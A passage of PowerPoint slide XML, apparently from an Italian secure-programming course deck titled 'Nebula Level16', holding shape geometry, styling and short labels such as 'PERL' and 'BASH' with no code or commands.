              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12532" h="5479" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="297" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="457"/>
                    <a:pt x="138" y="571"/>
                    <a:pt x="297" y="571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3014" y="571"/>
                    <a:pt x="4337" y="1690"/>
                    <a:pt x="5730" y="2854"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7259" y="4155"/>
                    <a:pt x="8834" y="5479"/>
                    <a:pt x="12235" y="5479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12395" y="5479"/>
                    <a:pt x="12532" y="5342"/>
                    <a:pt x="12532" y="5182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12532" y="5022"/>
                    <a:pt x="12395" y="4908"/>
                    <a:pt x="12235" y="4908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9039" y="4908"/>
                    <a:pt x="7556" y="3653"/>
                    <a:pt x="6095" y="2420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4703" y="1233"/>
                    <a:pt x="3242" y="1"/>
                    <a:pt x="297"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54" name="Google Shape;1422;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4711F5-8847-B1EC-D22F-0FA54015AC83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5664460" y="1931100"/>
              <a:ext cx="42787" cy="42333"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2170" h="2147" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1074" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="1"/>
                    <a:pt x="1" y="480"/>
                    <a:pt x="1" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1667"/>
                    <a:pt x="480" y="2146"/>
                    <a:pt x="1074" y="2146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1690" y="2146"/>
                    <a:pt x="2169" y="1667"/>
                    <a:pt x="2169" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="480"/>
                    <a:pt x="1690" y="1"/>
                    <a:pt x="1074"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55" name="Google Shape;1423;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5A2DF0-DBDB-C23A-44E7-23C47F2B8C16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5659077" y="1925243"/>
              <a:ext cx="53572" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2717" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1347" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="571"/>
                    <a:pt x="2146" y="937"/>
                    <a:pt x="2146" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2146" y="1804"/>
                    <a:pt x="1803" y="2169"/>
                    <a:pt x="1347" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="913" y="2169"/>
                    <a:pt x="571" y="1804"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="937"/>
                    <a:pt x="913" y="571"/>
                    <a:pt x="1347" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1347" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="593" y="1"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2124"/>
                    <a:pt x="593" y="2740"/>
                    <a:pt x="1347" y="2740"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100" y="2740"/>
                    <a:pt x="2716" y="2124"/>
                    <a:pt x="2716" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2716" y="617"/>
                    <a:pt x="2100" y="1"/>
                    <a:pt x="1347"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72" name="Google Shape;1424;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7DCFEFE-1A02-0E0E-62E8-8F1FA0329A8D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5942595" y="2027420"/>
              <a:ext cx="42787" cy="42314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2170" h="2146" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1097" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="0"/>
                    <a:pt x="1" y="479"/>
                    <a:pt x="1" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1666"/>
                    <a:pt x="503" y="2146"/>
                    <a:pt x="1097" y="2146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1690" y="2146"/>
                    <a:pt x="2169" y="1666"/>
                    <a:pt x="2169" y="1073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="479"/>
                    <a:pt x="1690" y="0"/>
                    <a:pt x="1097"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73" name="Google Shape;1425;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3DEBC9-FF6B-C439-3478-DC8FE6119200}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5937212" y="2021563"/>
              <a:ext cx="54026" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2740" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1370" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="571"/>
                    <a:pt x="2168" y="936"/>
                    <a:pt x="2168" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2168" y="1804"/>
                    <a:pt x="1803" y="2169"/>
                    <a:pt x="1370" y="2169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="936" y="2169"/>
                    <a:pt x="571" y="1804"/>
                    <a:pt x="571" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="936"/>
                    <a:pt x="936" y="571"/>
                    <a:pt x="1370" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1370" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="0"/>
                    <a:pt x="0" y="617"/>
                    <a:pt x="0" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2123"/>
                    <a:pt x="616" y="2739"/>
                    <a:pt x="1370" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="2739"/>
                    <a:pt x="2739" y="2123"/>
                    <a:pt x="2739" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739" y="617"/>
                    <a:pt x="2123" y="0"/>
                    <a:pt x="1370"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74" name="Google Shape;1426;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9DB0FD-DB46-E455-BA31-E0CC4240D5F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6114532" y="1595350"/>
              <a:ext cx="550887" cy="348369"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27939" h="17668" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2739" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1233" y="1"/>
                    <a:pt x="0" y="1233"/>
                    <a:pt x="0" y="2740"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14929"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16458"/>
                    <a:pt x="1233" y="17668"/>
                    <a:pt x="2739" y="17668"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25199" y="17668"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26729" y="17668"/>
                    <a:pt x="27938" y="16458"/>
                    <a:pt x="27938" y="14929"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27938" y="2740"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27938" y="1233"/>
                    <a:pt x="26729" y="1"/>
                    <a:pt x="25199" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2970AA">
                <a:alpha val="3482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75" name="Google Shape;1427;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFFE629E-3476-5C5E-2A6B-D6A8FE3639C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6062320" y="1543158"/>
              <a:ext cx="550887" cy="348349"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27939" h="17667" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2740" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1210" y="0"/>
                    <a:pt x="0" y="1210"/>
                    <a:pt x="0" y="2739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14928"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16434"/>
                    <a:pt x="1210" y="17667"/>
                    <a:pt x="2740" y="17667"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25200" y="17667"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26706" y="17667"/>
                    <a:pt x="27939" y="16434"/>
                    <a:pt x="27939" y="14928"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27939" y="2739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27939" y="1210"/>
                    <a:pt x="26706" y="0"/>
                    <a:pt x="25200" y="0"/>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76" name="Google Shape;1428;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BECB9E48-391A-2713-32C8-34E45230CFD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6056464" y="1537302"/>
              <a:ext cx="562146" cy="359608"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="28510" h="18238" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="25497" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26843" y="571"/>
                    <a:pt x="27939" y="1667"/>
                    <a:pt x="27939" y="3036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27939" y="15225"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27939" y="16572"/>
                    <a:pt x="26843" y="17667"/>
                    <a:pt x="25497" y="17667"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3037" y="17667"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="17667"/>
                    <a:pt x="571" y="16572"/>
                    <a:pt x="571" y="15225"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="3036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="1667"/>
                    <a:pt x="1667" y="571"/>
                    <a:pt x="3037" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3037" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1370" y="0"/>
                    <a:pt x="1" y="1370"/>
                    <a:pt x="1" y="3036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="15225"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="16891"/>
                    <a:pt x="1370" y="18238"/>
                    <a:pt x="3037" y="18238"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25497" y="18238"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27163" y="18238"/>
                    <a:pt x="28510" y="16891"/>
                    <a:pt x="28510" y="15225"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28510" y="3036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="28510" y="1370"/>
                    <a:pt x="27163" y="0"/>
                    <a:pt x="25497"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77" name="Google Shape;1429;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EDA09DC-95AA-EF42-DA7F-0EA2D8B4C6CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6125771" y="1602212"/>
              <a:ext cx="55386" cy="53927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2809" h="2735" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2489" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2415" y="1"/>
                    <a:pt x="2340" y="30"/>
                    <a:pt x="2283" y="87"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="2232"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2346"/>
                    <a:pt x="1" y="2529"/>
                    <a:pt x="115" y="2643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="2711"/>
                    <a:pt x="252" y="2734"/>
                    <a:pt x="320" y="2734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="2734"/>
                    <a:pt x="480" y="2711"/>
                    <a:pt x="526" y="2643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2694" y="475"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2808" y="360"/>
                    <a:pt x="2808" y="201"/>
                    <a:pt x="2694" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2637" y="30"/>
                    <a:pt x="2563" y="1"/>
                    <a:pt x="2489"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78" name="Google Shape;1430;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3DD40A-EDB2-D6E3-EE64-88C6D17E8DDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6125771" y="1602212"/>
              <a:ext cx="55386" cy="53927"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2809" h="2735" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="320" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="1"/>
                    <a:pt x="172" y="30"/>
                    <a:pt x="115" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="201"/>
                    <a:pt x="1" y="360"/>
                    <a:pt x="115" y="475"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2283" y="2643"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2329" y="2711"/>
                    <a:pt x="2420" y="2734"/>
                    <a:pt x="2489" y="2734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="2734"/>
                    <a:pt x="2626" y="2711"/>
                    <a:pt x="2694" y="2643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2808" y="2529"/>
                    <a:pt x="2808" y="2346"/>
                    <a:pt x="2694" y="2232"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="526" y="87"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="469" y="30"/>
                    <a:pt x="395" y="1"/>
                    <a:pt x="320"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79" name="Google Shape;1431;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E308CAD8-BDD7-0994-2FF2-DF29DF4105B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8521453" y="1752205"/>
              <a:ext cx="522000" cy="59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2600">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Bebas Neue"/>
                  <a:ea typeface="Bebas Neue"/>
                  <a:cs typeface="Bebas Neue"/>
                  <a:sym typeface="Bebas Neue"/>
                </a:rPr>
                <a:t>UI</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1480" name="Google Shape;1432;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E0DD697-0AD6-4F84-0372-A255BC7E0DC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6109875" y="1620513"/>
              <a:ext cx="462600" cy="193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solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Bebas Neue"/>
                  <a:ea typeface="Bebas Neue"/>
                  <a:cs typeface="Bebas Neue"/>
                  <a:sym typeface="Bebas Neue"/>
                </a:rPr>
                <a:t>PERL</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1481" name="Google Shape;1433;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFD3EF5-77A0-1CA2-C4E2-4341E93C4C66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6159982" y="3434775"/>
              <a:ext cx="677336" cy="38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2600">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Bebas Neue"/>
                  <a:ea typeface="Bebas Neue"/>
                  <a:cs typeface="Bebas Neue"/>
                  <a:sym typeface="Bebas Neue"/>
                </a:rPr>
                <a:t>BASH</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1482" name="Google Shape;1434;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC0F4946-EAAB-3F2E-4B7F-A527D53F8C7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5239775" y="1958162"/>
              <a:ext cx="522000" cy="38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2200">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Bebas Neue"/>
                  <a:ea typeface="Bebas Neue"/>
                  <a:cs typeface="Bebas Neue"/>
                  <a:sym typeface="Bebas Neue"/>
                </a:rPr>
                <a:t>&lt;/&gt;</a:t>
              </a:r>
              <a:endParaRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1256" name="Google Shape;1256;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978564" y="1098610"/>
            <a:ext cx="3307103" cy="2224518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="8800"/>
              <a:t>NEBULA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6600">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="6600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="8800">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LEVEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="8800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="8800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1257" name="Google Shape;1257;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415260" y="3392326"/>
            <a:ext cx="2505630" cy="559376"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8541"/>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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415260" y="3432448"/>
            <a:ext cx="2505630" cy="479132"/>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100" dirty="0"/>
              <a:t>Programmazione Sicura 2022/2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                <a:sym typeface="Quicksand"/>
              </a:rPr>
              <a:t>Prof.ssa B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1" dirty="0"/>
              <a:t>Masucci</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" b="1" dirty="0">
              <a:sym typeface="Quicksand"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1258;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFFF23D2-9FEF-B668-1D7F-4A66088E552F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452166" y="4508813"/>
            <a:ext cx="2778916" cy="479132"/>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2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
